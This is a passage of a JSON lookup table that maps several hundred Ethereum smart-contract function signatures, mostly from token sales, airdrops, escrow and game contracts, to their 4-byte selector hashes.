"exchangeTokensFromOtherContract(address,address,uint256)": "0x2aeacd4a", "Vegetoken(uint256,string,uint8,string)": "0x47a69dfd", "reclaimNtvuEther(uint8)": "0xddafaf4d", "maxBidEth()": "0x49266f2f", "totalBidEth()": "0xae0db13c", "totalBidCount()": "0x7cbc6903", "totalAuctorCount()": "0x281c08ad", "auditNTVUText(uint8,uint8,string)": "0xa7a1e0a7", "playingNTVU()": "0x2e3c2259", "queryNTVUs(uint256,uint256)": "0x554ad7ff", "createNTVU()": "0x2dc03b22", "unlockFundsAndPassEther()": "0xa9831edf", "submitNextStage()": "0xaf0ac4b7", "getAvailableFundsForTheTeam()": "0xd26ee061", "getCurrentSellPrice()": "0xd5775f5c", "getNumberOfTokensForTheTeam()": "0xf6a14bf7", "getAverageTokenPrice(address)": "0x556d5139", "getWeiAvailableToReturn(address)": "0x9d87e7f0", "returnAllAvailableFunds()": "0x4bb13055", "TakeMyEther()": "0x4d9250c4", "CPT()": "0xf191c26d", "PythonCoin()": "0x4f9899c3", "FawnCoin()": "0xe2ef9241", "AG()": "0xe4ec404c", "ParisToken()": "0x273afe15", "GameToken()": "0x5750daa0", "ShamelessUETRipoff()": "0x24167745", "TWOIoT()": "0x06d1772d", "sellFci(uint256)": "0x812cbf38", "setPoolStatus()": "0x47aa7cd4", "changeTradableFciInSession(bool)": "0xacf2f478", "BinaryOptionV2(address,address,address)": "0xec59565f", "withdrawNonTop(uint256)": "0xd7837ec9", "withdrawTop(uint256)": "0xcf1b3f08", "withdrawNonTopForTeam(address,uint256)": "0x7f6ec891", "withdrawTopForTeam(address,uint256)": "0xae012367", "_withdrawNAC(address,uint256)": "0x1ebeec82", "closeEthPool(uint256)": "0x8149657b", "withdrawEthPool(uint256,uint256)": "0xa3e3a8e0", "depositEthPool(uint256)": "0xe1f8926b", "changeTopWithdrawable(uint256)": "0xb950ae2b", "changeWithdrawable(uint256)": "0x49420759", "closeActive(uint256)": "0x02df45a8", "deactivateUser(address,uint256)": "0x11467d7c", "activateUser(address,uint256)": "0xdd30651f", "withdrawNAC(uint256)": "0x69aab7e3", "NamiPool(address,address,address)": "0x17d077af", "DGClubCoin()": "0x51c1ae00", "tokenAvailable()": "0x5ebdd159", "weiToToken(uint256)": "0xbd8e0905", "tokenToWei(uint256)": "0xd108ffc0", "MichCoin(uint256,uint256,uint256,uint256,uint256,uint256,address,address)": "0x2dd1cc27", "KDOU()": "0xdc2811cd", "createPromoEggs()": "0x07006a55", "EthimalFounderEggs()": "0xfa6f3522", "DORCoin(address)": "0x1c7d5334", "SXSYCoin()": "0x71515a36", "ADA(uint256,string,string)": "0x64610c73", "QUINToken(uint256,string,string,uint256)": "0x239b6dd1", "TrivialToken(string,string,uint256,uint256,address,address,uint256,uint256,uint256)": "0x14d03ea6", "MetadollarShare()": "0xa72299dd", "Factom()": "0x8453a8c8", "buyTPT(uint256,uint256,uint8,bytes32,bytes32)": "0xcee73630", "buyNDC(uint256,uint256,uint8,bytes32,bytes32)": "0x4dd60ff9", "swap(uint256,address,address,uint256,uint256,uint8,bytes32,bytes32)": "0x951b22fb", "swapFor(address,uint256,address,address,uint256,uint256,uint8,bytes32,bytes32)": "0x5a416920", "setMinSwapAmount(uint256)": "0x320d4534", "setNeverdieSignerAddress(address)": "0x3bfecbf0", "setNeverdieContractAddress(address)": "0xd0aff67d", "setTeleportContractAddress(address)": "0xeaaf88c1", "TokenSwap(address,address,address)": "0xad79c927", "calculateOwnerFee(uint256)": "0x413e4aaf", "calculateCharityFee(uint256)": "0x0b2d25ca", "getNumberOfVotes(uint256)": "0xc71f4253", "_createVote(uint256,uint256,uint256)": "0x8e455a1d", "transferToCharity(address)": "0xfb101581", "doVote(uint256,uint256)": "0x6ece7d88", "CTBoatGame(address,address,uint256)": "0xc2f415b5", "extendSaleTime()": "0xe72b6091", "AIgathaToken(address,uint256,uint256,uint256,uint256,uint256)": "0x37c8f1d1", "processFailedVerification(bytes32)": "0x243222c0", "getMyGameCompleted(address,uint256)": "0x479ed225", "getNumberOfMyGamesCompleted(address)": "0x917603e5", "getGameCompleted(uint256)": "0x118da6fb", "getNumberOfGamesCompleted()": "0x48f0b8e3", "getBalanceInPlay()": "0x4f504d72", "isValidBet(uint256)": "0xf19e774e", "isGameRunning()": "0xb9df2d22", "changeOraclizeGasPrice(uint256)": "0xc0c1b107", "distributeDonationTokens()": "0x98e314a2", "getCurrentTokenCost()": "0x43cb2b03", "crowdSaleDonate()": "0x1d14e5ff", "donationCount()": "0x2abfab4d", "X()": "0xc1599bd9", "setExchange(bool)": "0x3c269b96", "RobotBTC(uint256,string,string)": "0x0b4efd9a", "KyberContirbutorWhitelistOptimized()": "0x5a4e69f0", "TokToken()": "0x934d8a2e", "destroyFreezeFunds(address)": "0x7a4e365d", "EmmiumCoin()": "0x040502e4", "NBAT(address,address,address,address,address)": "0x3e7b684d", "HTC()": "0xf9ef2c7d", "issueReservedTokens(uint256)": "0xfce927f3", "issueLockedTokensCustom(uint256,uint64)": "0x65ae247e", "issueLockedTokens(uint256)": "0xac3314a6", "currentRoundIndexByDate()": "0x8a20f724", "currentRoundIndex()": "0x6896ef4b", "issueTokensMulti(address[],uint256[])": "0x92e8438c", "OrguraExchange()": "0xb561d5b3", "GreenWorldFarm()": "0xd07f2ff6", "StarterCoin(uint256,address)": "0x94b2ffc0", "oracalize_gaslimit()": "0x3f021e2e", "dontPanic()": "0xf5a7ffeb", "encoded_data()": "0xb89761b8", "charitySplitPercent()": "0xc50f197b", "presaleGoing()": "0x9f80d1b2", "weiRaisedPreIco()": "0x51888969", "getAllGamesCount()": "0x1e6bd462", "totalWeiWagered()": "0x666f4cad", "Finalize()": "0xc5454d11", "advisoryTotalSupply()": "0x4ba6e72e", "issueIndex()": "0x6a28f828", "Standard_4()": "0x5f8a3029", "isReward()": "0x96934e88", "MAX_ETH()": "0x9dfd4e2f", "privatesaleAddress()": "0xa757ac4b", "rewardAdjustmentPeriod()": "0xff62d2cf", "fundingMinCapInWei()": "0x7ee6b2d0", "noOfWaves()": "0xb73fe963", "strategicReserveSupply()": "0xad418e66", "preSaleAmount()": "0x07f4eace", "getAffiliateLevel()": "0x54f9962a", "remainAmount()": "0x25e7514b", "TOKEN_SALE3()": "0xac60da79", "isHarvestEnabled()": "0x9e47214a", "privatePresaleAllocatingToken()": "0x3799bbd3", "ICO_PHASE3_BONUS_PERCENTAGE()": "0x24b79a1c", "timeoutSEC()": "0xe7225175", "ico2Cap()": "0xa44dd0f1", "CONTRIBUTION_END()": "0xe5f796fd", "newTokenPrice()": "0x3714ae13", "capIncreased()": "0xb41762f9", "price_in_wei()": "0xc74a690c", "annualPos()": "0x21ed47b3", "burnAmount()": "0x486a7e6b", "COMMUNITY_ADVISERS_STAKE()": "0x2390507b", "depositCounter()": "0xecb3dc88", "custodyFactory()": "0x1c4ad465", "tokenCapPhaseOne()": "0x5e73dd37", "arbiter()": "0xfe25e00a", "exchangeToken()": "0xa25eb5d9", "refundDuration()": "0x172325c7", "lotteryTokensPercent()": "0x7777d088", "roundTwoTime()": "0xcba91a35", "CROWDSALE_ETH_IN_WEI_FUND_MAX()": "0xb07f3025", "MAX_FUNDING_AMOUNT()": "0xa1c29db6", "lastInvestorsProfitDay()": "0xa656e51f", "conversionsCount()": "0x3b5b64f4", "divForEthertoteLiquidatorWallet()": "0x86f10e8b", "icoIsClosed()": "0x4c7d3e3f", "SALE1_CAP()": "0x79ab295f", "cancelContract()": "0x2b68bb2d", "frontendAddress()": "0x3941456c", "saled()": "0xcb923813", "repossessionBountyPerTen()": "0x4db1ba5a", "setup_token()": "0xfc892cfe", "burnAfterSoldAmount()": "0x9fd52984", "dateEndICO()": "0x6372ba1a", "initialSupportAmount()": "0xab28c704", "forSale()": "0x466ccac0", "howManyDicks()": "0xf98038ee", "period2Numerator()": "0x4c77c0e2", "getBonusCoefficient()": "0xa2fdea11", "lpAskVolume()": "0xfb97b61f", "tokenSaleHalted()": "0x6600811c", "bonusFreeLOT()": "0x85b8c64a", "GDCNumber5()": "0x9162a905", "tokensBoughtInEarlybird()": "0xf8ac6570", "reentrantGuard()": "0x7f1ebc4d", "secondsInDay()": "0x5ec3f160", "EtmPerBtc()": "0xdb3c1b94", "institution()": "0xd1384eb6", "globalChanceNo()": "0xb6889e48", "preSaleBonus3Percent()": "0x82c20f84", "mainSaleBonus()": "0xa7321096", "midEtherBonusLimit()": "0x86707026", "whitelistController()": "0x6124a577", "summPartnershipsAndExchanges()": "0x3abd3a68", "rewardDaysLeft()": "0xf6ada1ad", "joysoWallet()": "0x135a2474", "boughtWithoutWhitelist()": "0x29e286c6", "PROOF_TOKEN_WALLET()": "0x71873971", "penalty()": "0x0edd2ffc", "TokensPerWei()": "0x5cfea6fb", "totalTeams()": "0x654c6daf", "getTokenRaised()": "0x6d15cecd", "tokenFundDeposit()": "0x9a0750d5", "price_agent()": "0x023c61ca", "randomPlayer()": "0xd6427c24", "rewardDistributionEnded()": "0x2d52d1a2", "INCREASE_RATE()": "0xc0b3aff3", "baseFeeDivisor()": "0xfd0cfa91", "rewardFoundersAndPartners()": "0xb050b49c", "smallRate()": "0x42767018", "getExpiringUnitList()": "0x3ef7c687", "deployedOn()": "0x73fc8420", "commonDiscount()": "0x0e8f0a95", "preEtherReceived()": "0xf92ec991", "getOverBalanceWEIInfo()": "0xe7933601", "rewards()": "0x9ec5a894", "buyBackPrice()": "0xe23000a0", "aimeIncreasePerTrip()": "0xa6fdedef", "last_mint()": "0xeb7a7241", "privateSaleToken()": "0xafaf97e7", "poolWallet()": "0x8d93ec88", "contractPays()": "0xe343fea6", "beginBlock()": "0xa6903278", "dvipAddress()": "0xf318c75f", "frozenWallet2y()": "0xb0c42691", "LAMBO_TYPE()": "0x3cb3ea68", "rewardTwo()": "0x738c2931", "stageDistributed()": "0x9beef73f", "EMISSION_FOR_SALESTAGE6()": "0x554dbfc2", "winningNumber()": "0x4664611e", "holdoverBalance()": "0xfa1e4fcb", "FUTURE_WALLET()": "0x4e1f6c14", "claimPrice()": "0x15d655c9", "processStep()": "0xec5134ca", "proposedWithdrawal()": "0x518496b2", "houseTopUp()": "0x08d7aa9c", "funding_ended()": "0x4258d771", "Wei_Remaining_To_ICO_Cap()": "0xd13e2a6a", "MINIMUM_ETHER_SPEND()": "0x74900c92", "mintarget()": "0x977ab3c2", "isOriginalRoundContributor()": "0x16bb1f6a", "bet_MIN()": "0xfc0808e5", "destructed()": "0x0bf1c747", "_iD()": "0x19d2fe85", "totalBonus()": "0xa8dd07dc", "REMAINING_SUPPLY()": "0x85d63cce", "TransferTokens()": "0xa7ff0a4e", "maxInvestors()": "0xbc99cc37", "sanMaxAmount()": "0x682ed9ea", "BTC_SUISSE_TIER_4()": "0x368e5d4e", "GrimReaperAddress()": "0x96c72144", "tokensOfTeamAndAdvisors()": "0x9c0f16ed", "discountValue()": "0xe0ebd259", "deathData_f9()": "0x78862e69", "advteamPool()": "0x26dfb6b4", "ICO_START3()": "0x52c0b9f7", "officialAddress()": "0xfcd41c1f", "publicSoftCapReached()": "0x2d5858a3", "appendOnly()": "0x675629fe", "gameMinBetAmount()": "0xcda0eeaa", "getTotalDivsProduced()": "0xae882412", "distributionOfTokens()": "0x708e03d9", "WAN_TOTAL_SUPPLY()": "0xb6d8f59d", "icoFinishTimestamp()": "0x8f617fcd", "secondWeekEndTime()": "0xe422f311", "tokenFrozenSinceBlock()": "0xd4acfa01", "_minimumContribution()": "0x9714f05c", "usersCanTrade()": "0x5dd4599a", "publicSaleRaised()": "0x30074c6c", "purchaseAdmin()": "0x816d3da9", "nextEndTime()": "0xdb530222", "TestText()": "0x81ce7184", "hard_limit()": "0x810a3919", "currentInvoice()": "0x22b1f39c", "factoryOwner()": "0x4273601c", "createDepositAddress()": "0x667a2f58", "min_bet()": "0xca53135a", "ACO_Token()": "0xb10908ff", "saleHardCapEther()": "0x72a7019c", "stakeTokenContract()": "0x5132faca", "recently_added_address()": "0x3dc7ea7f", "EDU_KYC_BONUS()": "0xe1fd632f", "refundStarted()": "0xb6c1eaad", "issuedNum()": "0xff592125", "commissionPer()": "0x302dfe97", "minboc()": "0x0f57eb79", "pre_minContribution()": "0xa15b53ad", "percent2()": "0x074a1600", "visitingUnicorns()": "0x1453bfb3", "claimD()": "0x359c8a93", "whitelistBonusRate()": "0x68db96a6", "leakEther()": "0x7b979b41", "FREEZE_TIME()": "0x1a038873", "threeMillionTwoHundredThousand()": "0x241b88b6", "paidAddress()": "0xcc14a7a3", "weiToDistribute()": "0xcd2b5a82", "getMineTokenAmount()": "0x480d7504", "nextPrizeTime()": "0xf5486860", "totalRunePurchased()": "0x7ab61372", "ico3Tokens()": "0xcbe432b0", "betHigh()": "0x8fadd08b", "toCancel()": "0x47b8b30b", "ETH_MAX_LIMIT()": "0x17e5259e", "auctionContract()": "0x0ab8afac", "companySupply()": "0x83eb7257", "globalUnlockTime()": "0xbae944ba", "wad()": "0x7df38c5b", "importersBanksLetterOfCredit()": "0xf94df54f", "BASE_REWARD()": "0x22009af6", "addressPartnershipsAndExchanges()": "0x712c3f7a", "lastPurchaseTick()": "0x21288400", "weiPerInitialHONG()": "0x089aa819", "MIN_GET_AMOUNT_FINNEY()": "0xe829a171", "firstUnlocked()": "0x8f03f5c3", "getFinishDates()": "0x7d6e061c", "PRICE_ICO4()": "0x1565b0b6", "PFC()": "0x3701fada", "getSigner(bytes32,uint256)": "0x4fa6caf6", "getSignersCount(bytes32)": "0x46aaf139", "resetSignature(bytes32)": "0x5969c0e1", "addSig(address,bytes32)": "0xe287adf4", "getEscrowPayments(uint256)": "0xfd232b59", "getEscrow(uint256)": "0x7d19e596", "cancelEscrow(uint256,uint256,address,uint256)": "0x6a8be019", "cancelEscrowByProvider(uint256)": "0x3073c916", "completeEscrow(uint256)": "0xdf3e0a1d", "createEscrow(address,address,uint256,uint256)": "0xccbae5f6", "GetClientBalance()": "0xcbdb4f72", "GetClientCategory()": "0x2fd5a13d", "ChangeClientCategory(address,uint256)": "0x823e1832", "ChangeInterest(uint256,uint256,uint256,bool)": "0xe31b1aae", "restart(bool)": "0x33c7d1cc", "nextPack(uint256)": "0x33a8dc1d", "packSettings(uint256)": "0x99a48638", "addUserWhoSell(address,address,uint256,uint256,uint256,uint256,uint256,uint256)": "0x1b5df453", "addUserWhoBuy(address,address,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xd9f69e4e", "VOZToken()": "0x187b1f2a", "CreateCodeToken(uint256,string,string)": "0x0de1f4c1", "run(uint256)": "0xa444f5e9", "setSink(address[],uint256[])": "0x4898722d", "appendSource(address[],uint256[])": "0x55c0a5f4", "PundiXCash()": "0x2d76a85a", "TranslationService()": "0xa622510b", "FreePPCoin()": "0x00604854", "update(address[],uint256[],uint256[],uint256[])": "0x4e53a0b9", "setStates(address[],uint8[],uint8[])": "0xcdc04961", "setOwner(address,bool)": "0x516c731c", "Updater()": "0x73770c01", "burnGlobFoneCoin(uint256)": "0xc73f0c11", "AirdropMultiple(address[],uint256)": "0xc0e093f1", "AirdropSingle(address,uint256)": "0xa50f2a25", "GlobfoneCoin()": "0xdde6f449", "PoC()": "0xafce2d62", "LTY()": "0x47810b3e", "PJR()": "0x5fb8fed6", "mint(bytes)": "0x7ba0e2e7", "updateGravatarImage(string)": "0x0081d6e5", "updateGravatarName(string)": "0xb18588fb", "getGravatar(address)": "0x359c1f72", "createGravatar(string,string)": "0xcdb3344a", "sendToOwnerBalance(address,uint256)": "0xfd1aaa72", "minContribution(uint256)": "0x9f00237b", "getServiceURI(address)": "0x214c2a4b", "setServiceURI(string)": "0x5f11301b", "ServiceRegistry(address)": "0x4a0f0bfe", "exchangeERC20(address,address,uint256)": "0x3a40c544", "setSupportedTokens(address,bool)": "0x784279d8", "EriCoin()": "0x74f569e7", "getOfferIdsByToken(address)": "0x1bda84b3", "getOfferCountByToken(address)": "0x0047850a", "removeOffer(uint256)": "0x95a0f9c7", "getBidIdsByToken(address)": "0xf88489a6", "getBidCountByToken(address)": "0x3a23399c", "cancelBid(uint256)": "0x9703ef35", "removeBid(uint256)": "0xb320f459", "create(address,address,address,address,address,address)": "0x43f70917", "multyTx(address[100],uint256[100])": "0x3e8d6e9f", "MENSA1(address)": "0xb11ec3b3", "REGO()": "0xcb757e92", "QuanYToken()": "0xf1378efa", "forcedTransferAll(address,address)": "0xfa8a975d", "forcedTransfer(address,address,uint256)": "0x9fc1d0e7", "decreaseAllowance(address,address,uint256)": "0xd73b1dc9", "increaseAllowance(address,address,uint256)": "0x6c43a2ca", "getAccountBlockedFunds(address)": "0xbe2a2ff2", "unblockAccountFunds(address,uint256)": "0x7fa87949", "blockAccountFunds(address,uint256)": "0xc60c13a3", "getAccountBlocks(address)": "0x95534e00", "emitBurnEvent(address,uint256)": "0xed810cfa", "emitMintEvent(address,uint256)": "0x958689d7", "setCrydrController(address)": "0x305f17d5", "executeDelegatecall(address,uint256,bytes)": "0xd2b7d957", "WBET()": "0xba16ae2d", "QRRial()": "0xf075f253", "TronGold()": "0xc31989ed", "witrhdraw(uint256)": "0x0c79af3d", "distribute(uint256,uint256,uint256)": "0xd2de6ec5", "buyandearn(uint256)": "0xf95a5504", "setAmountToClaim(address,uint256)": "0x9cd70235", "addToWhitelistBulk(address[])": "0xa81c804e", "EightStandardToken(uint256,string,uint8,string)": "0x14f72e50", "CleanFoodCrypto()": "0x50392bcc", "SCCC(uint256,string,string)": "0x8176419f", "BioChainCoin()": "0x6f8fccd7", "transferTokenToMultiple(address[],uint256)": "0xc3888bce", "transferTokenTo(address,uint256)": "0x8144650a", "CyberMusicToken()": "0xc2e88185", "getBonus4(uint256)": "0xd05ec6c5", "getBonus3(uint256)": "0xe2df6c6f", "getBonus2(uint256)": "0xa5fd1838", "dropTokenV2(address[])": "0x40e87f13", "dropToken(address[])": "0x6b2a86be", "LifeSet_003()": "0xdec26d55", "get_token_data_buyable(uint256)": "0x7c968f5d", "get_token_data(uint256)": "0xa726be9a", "stop_sell(uint256)": "0x6effb579", "set_price_and_sell(uint256,uint256)": "0xf7b42d08", "emitTimeAdded(uint256,uint256)": "0x61f30408", "emitWorkResumed(uint256,uint256)": "0xb633d272", "emitWorkPaused(uint256,uint256)": "0xc26d0c2c", "emitWorkStarted(uint256,uint256)": "0xb7d8b1d9", "emitJobOfferAccepted(uint256,address)": "0x8680e52d", "emitJobOfferPosted(uint256,address,uint256,uint256,uint256)": "0x1972b464", "emitJobPosted(uint256,address,uint256,uint256,uint256,bytes32,bool)": "0xe270398a", "getJobDetailsIPFSHash(uint256)": "0x32c514d5", "getJobsCount()": "0xd07e9f90", "releasePayment(uint256)": "0x88685cd9", "cancelJob(uint256)": "0x1dffa3dc", "confirmEndWork(uint256)": "0xaea1935b", "endWork(uint256)": "0x3de035bf", "_setNewEstimate(uint256,uint16)": "0x7f725862", "addMoreTime(uint256,uint16)": "0xe187eaf7", "_resumeWork(uint256)": "0x730740f8", "resumeWork(uint256)": "0xfd03d762", "pauseWork(uint256)": "0xf839dc62", "confirmStartWork(uint256)": "0x93361078", "startWork(uint256)": "0x03a250f9", "acceptOffer(uint256,address)": "0x918d407d", "_hasSkillsCheck(uint256)": "0xbc5e4bb4", "_validEstimate(uint256,uint256,uint256)": "0x70a7b3e8", "postJobOffer(uint256,address,uint256,uint256,uint256)": "0x65aa96bd", "postJob(uint256,uint256,uint256,bytes32)": "0x42cfd792", "calculatePaycheck(uint256)": "0x89c29b61", "calculateLockAmount(uint256)": "0x596fab6c", "hasSkills(address,uint256,uint256,uint256)": "0x1e0b8c87", "indexPrice(uint8)": "0xe392a521", "authorize(address)": "0xb6a5d7de", "testSettle()": "0x3b9e9c91", "testResetBet()": "0x64e48fcd", "testMakeBet()": "0xc8b7e8c3", "testBetAmount()": "0x8878356d", "testBetId()": "0x6d640637", "RevokeViewingPrivelege(address)": "0xde70b36c", "AllowSomeoneToViewMyKeys(address,string)": "0x63722de4", "ViewMyPrivateKeys(string)": "0xf14467fb", "AddPrivateKey(string,string)": "0xa75dd0d4", "CreateEstate(address)": "0x7bbba97e", "MintDarioToken(int256,address,int256,uint256)": "0x755d80ab", "Dario(uint256,int256,uint256)": "0xd305671a", "DarioAdministrator()": "0xa6f0cba6", "test_logs()": "0x48e6b393", "UsingDB(address)": "0xf0bcaf75", "readPermissions(address,uint256)": "0xf0459440", "allow(address,bool)": "0x110496e5", "readAddressList(address,uint256,uint256)": "0x3803b7d3", "readCheckList(address,uint256,uint256)": "0xffd68462", "readQuantityList(address,uint256,uint256)": "0x659b586e", "readInfoList(address,uint256,uint256)": "0xd9696054", "readAddress(address,uint256)": "0xbae72565", "readCheck(address,uint256)": "0xdaee4dd6", "readQuantity(address,uint256)": "0x33f3344c", "readInfo(address,uint256)": "0x3687e921", "addQuantityListItem(bool,address,address,uint256,uint256)": "0x306b4dea", "addAddressListItem(bool,address,address,uint256,address)": "0x0e7bda18", "addBoolListItem(bool,address,address,uint256,bool)": "0x0f3554ad", "addInfoListItem(bool,address,address,uint256,string)": "0x6ef8c661", "addAddress(address,address,uint256,address)": "0x69f80b4a", "addCheck(address,address,uint256,bool)": "0x6fb7b52e", "addQuantity(address,address,uint256,uint256)": "0x55c2a0ac", "addInfo(address,address,uint256,string)": "0xd6c7b65b", "Dsocial()": "0xfc0c38a7", "setaddAddressListItemSet(bool)": "0xb0043308", "addAddressListItem(uint256,address)": "0xe44dbb75", "subscribeIndividual(bool)": "0xd7fc98c3", "getDateOfAcceptance()": "0xb0894aa6", "getLastWithdraw()": "0xfac952c5", "getInitialWithdraw()": "0x93f32659", "Offer(address,address,bytes32,uint256,uint256,uint128)": "0x328929e0", "matches(bytes32,bytes32)": "0xfe6f2a60", "Hodor(string)": "0xf1686296", "boolToInt(bool,bool)": "0xec005255", "is_diagonal(int8)": "0xbf8c6b63", "getDirection(uint256,uint256)": "0x6ca7b99b", "sanityCheck(uint256,uint256,int8,int8,int8)": "0x79c0b9fb", "getTokenFunction(uint8)": "0x1fcb292d", "createTokenFunctions()": "0xaa7bc1c0", "makePublic()": "0xfc018c05", "makePrivate()": "0x7c84b40c", "getOperation(uint32)": "0xa20741dd", "getOperationsLength()": "0x093d5fd4", "makeOperation(uint32,string)": "0x027efe2b", "Auto(address,string)": "0xf73079a6", "UpgradeTokens()": "0x39055172", "ChangeLicense(address,bool)": "0x72f443be", "PeculiumOld()": "0x1ea134b9", "changeRage(uint256)": "0x8ede74c1", "stopSale()": "0xe36b0b37", "stakeholderPayment(address)": "0xa3a27105", "updateReserveToken()": "0x437583a9", "setTokenURI(uint256,string)": "0x162094c4", "ERC721TokenMock(string,string)": "0x47d5d5b5", "transferAddress(address)": "0xed6cb909", "processProcessableAllocations()": "0x3c35a858", "addProcessableAllocation(address,uint256)": "0x8b220a31", "processAllocation(address,uint256)": "0x88559aaf", "markCompromised()": "0x5be80e85", "stake(uint256)": "0xa694fc3a", "knownRoleNames(bytes32,bytes32)": "0x3037cea3", "contractHash()": "0x904c6094", "resetLotto()": "0x63ef8d9e", "LYBTToken(uint256,string,uint8,string)": "0xd5bc0a07", "SaniCoin()": "0xd9a50120", "airdropDiff(uint256[],address[])": "0xab3dd698", "SocialLendingToken(uint256,string,string,uint256)": "0xe5d607f3", "qshdrop(address[],uint256[])": "0x220e5d06", "qshdrop(address[],uint256)": "0x2e108133", "QSHUCOIN()": "0x8c339a58", "DOO()": "0xede2271c", "NeCashTokenSale()": "0x5b3bab74", "NecashToken()": "0xb28c48bb", "NecashTokenBase()": "0xc1adb83e", "clearApproval(uint256)": "0x7fdd5403", "DC()": "0x780249cd", "timeLock(address,uint256)": "0xd91dc952", "setTradable(bool)": "0x7cd50577", "PitEur(address)": "0x8f287be5", "pwr(uint256,uint256)": "0xf74e9bde", "sq(uint256)": "0x08fe23ca", "PunchToken()": "0x335f9303", "changeControllerInBntyTokenContract(address)": "0xbaad0828", "destroyTokensInBntyTokenContract(address,uint256)": "0x252f4977", "changeStakingContract(address)": "0x94db4d05", "Bible()": "0xb4307192", "setAdminAddressForComissions(address)": "0xbb6b38bb", "HomeLoansToken(uint256,string,uint256,string)": "0x4a8646c3", "AnythingAppTokenPreSale(address,address,address,uint256,uint256,uint256,uint256,uint256)": "0x5ec1b499", "DO()": "0xf6832c4a", "MIDO()": "0x6d301f38", "DDFToken(uint256,string,uint8,string)": "0x10fcda55", "coinanx()": "0x3308ecf1", "OBSERVER(uint256,string,string)": "0x9715f05d", "getAct()": "0xbb898233", "Act()": "0x5cd82ee5", "Test7J()": "0xa64bb045", "CharlieToken()": "0xb74746e7", "SportistToken()": "0x98b04c16", "Test8J()": "0x20fb36af", "TopiToken()": "0x9657f8ad", "Token1Token()": "0x861fcefb", "PETTCOIN()": "0x2fbfbc85", "PawCoin()": "0x51cc7cbe", "CustomToken(uint256,string,string,uint256)": "0xb5f12736", "monakojima001()": "0x11c1dc82", "Test6J()": "0xbf9005ec", "Trenggalek()": "0x931fbdd8", "Gol()": "0x9b91f9be", "Pele()": "0x3eb54d80", "coinanxtemp()": "0x0dc115c8", "Gobi()": "0x5e01b2e6", "AnkitToken()": "0x3508eddb", "greatgreatcoinERC20Token()": "0x71feaac5", "getERC721AmountPawn(uint256,address)": "0x1a82844c", "getERC721AddrPawn(uint256,address)": "0x6c5091e3", "getERC721AddrPawn(uint256)": "0x2ab0252d", "getERC20Pawn(uint256)": "0x06f7f3fe", "SmartN()": "0x5ce1d810", "Test1Coin()": "0xb73c71b2", "RecToken()": "0xfe229f7c", "subtract()": "0x6deebae3", "ZilliqaToken(address,uint256)": "0xd29cafe1", "lulaToken()": "0x38905bea", "startDisbursement()": "0x6b21a636", "finalizeTge()": "0xff5a478b", "finalizePretge()": "0xb45b290d", "transferFromHyperstakingdisbursementfund(address,uint256)": "0x365e808d", "transferFromInternalstaffdisbursementfund(address,uint256)": "0x52704644", "transferFromTangibleassetdisbursementfund(address,uint256)": "0x5d2434ec", "transferFromNonprofitdisbursementfund(address,uint256)": "0xedf8333d", "transferFromStakedisbursementfund(address,uint256)": "0xcf35f275", "transferFromPosttgefund(address,uint256)": "0x85ddb747", "transferFromTgefund(address,uint256)": "0x5c67f7b0", "transferFromPretgefund(address,uint256)": "0xfe62a0a6", "transferFromTangibleAssetfund(address,uint256)": "0xd5f9ac43", "transferFromInternalStakingfund(address,uint256)": "0xa650ebbc", "setHyperDisbursementAddress(address)": "0xcd1a4e4d", "setStaffDisbursementAddress(address)": "0xa1fc21f4", "setTangibleAssetDisbursementAddress(address)": "0x6b7d5dfd", "setNonprofitDisbursementAddress(address)": "0x854f1663", "setStakeDisbursementAddress(address)": "0xdcaee066", "setPosttgeAddress(address)": "0x6219004d", "setTgeAddress(address)": "0x8e7b90e4", "setPretgeAddress(address)": "0x4a6b8cf6", "setTangibleAssetAddress(address)": "0x4278ff31", "setInternalStakingAddress(address)": "0x652b810c", "GlobalAssentToken()": "0x180c0da6", "transferTokens(uint256,address[])": "0x0fb125ac", "MyFeed2Token()": "0x46fa14e5", "Rena()": "0x9efe6454", "STTCToken()": "0x9daa7b46", "DevxToken()": "0xb009c50d", "Test22Coin()": "0xb44f776a", "status(uint8)": "0xa189a487", "airdropCall(address,address,uint256)": "0x112f5eb8", "Neymar()": "0x9d7b7636", "DiceOnline()": "0xe081b569", "doCalculateRoom(uint256,uint256,uint256,bytes32,uint256)": "0xb070bbd4", "doCalculate(uint256,uint256,uint256,bytes32)": "0x190f4cfc", "IOBT()": "0xb2b5f0cf", "isError(uint8)": "0xbb0e01fd", "setTokenInformation(string,string,uint8)": "0xaa3435c0", "mint(address[],uint256[])": "0xe467f7e0", "SAFEToken(uint256,string,string,uint8)": "0xb90dcc58", "setRefProgram(address)": "0xed70d83c", "PChannel(address)": "0x9d3c015e", "transferDataOwnership(address)": "0xe4952ddb", "withdrawOwner(address,uint256)": "0xa3885413", "withdraw(address,uint256,bool)": "0xead5d359", "setInvestors(address)": "0x0d99f40a", "invite(address,address)": "0x6f4c6443", "distributeInvestorsFee(uint256,uint256)": "0x36bf392b", "updateStatus(address,uint8)": "0x44c5bbf8", "distribute(address,uint256,uint8,uint256)": "0x02911cfe", "invest(address,uint8)": "0x581c5ae6", "Referral(uint256,address,address,address)": "0xf839eb1a", "setFeeDistributionAndStatusThreshold(uint8,uint8[5],uint256)": "0x6a23e7cf", "setFeeDistributionsAndStatusThresholds()": "0x098fb45c", "Declaration()": "0xa076e223", "setParent(address,address)": "0xb3204b8b", "addReferralDeposit(address,uint256)": "0xa7f1b77a", "subtrInvestorBalance(address,uint256)": "0x0452396c", "addInvestorBalance(address,uint256)": "0xae056477", "subtrBalance(address,uint256)": "0x5a6af33b", "investorBalanceOf(address)": "0x61fba37d", "parentOf(address)": "0xee08388e", "AIREP()": "0xb7a6b6a7", "bmy(uint256,string,uint8,string)": "0xc1238940", "HOPE(uint256,string,string)": "0x7d57edf3", "commit(bytes)": "0x66fd3cd8", "Dividend(address)": "0xd10d42eb", "pauseForDividend()": "0x91dc6d36", "appendTokenHolders(address)": "0x2bd185e5", "StudioToken()": "0x727e2422", "AlphaCarToken()": "0xdfdadec6", "wwwithdrawww(uint256)": "0xcd84cff4", "eexploitOwnn()": "0x471fabfd", "setMyContractt(address)": "0x08bde7d4", "own(address)": "0xf349e3e3", "calculateBonusTokens(uint256)": "0xd30a119b", "getSoldTokens()": "0xa6ceaeb8", "getNextBonusIndex()": "0x7488aa3c", "getCurrentBonusTier()": "0x523da442", "getBonusTier(uint8)": "0xab8ca6e9", "getBonusTierCount()": "0x75dcb701", "withdrawChi()": "0x88d7e087", "resetMaxBonusThreshold()": "0x9d210369", "ChiSale(address,uint256[],uint256[])": "0xed50dd4e", "LOL()": "0xb8e3d8e8", 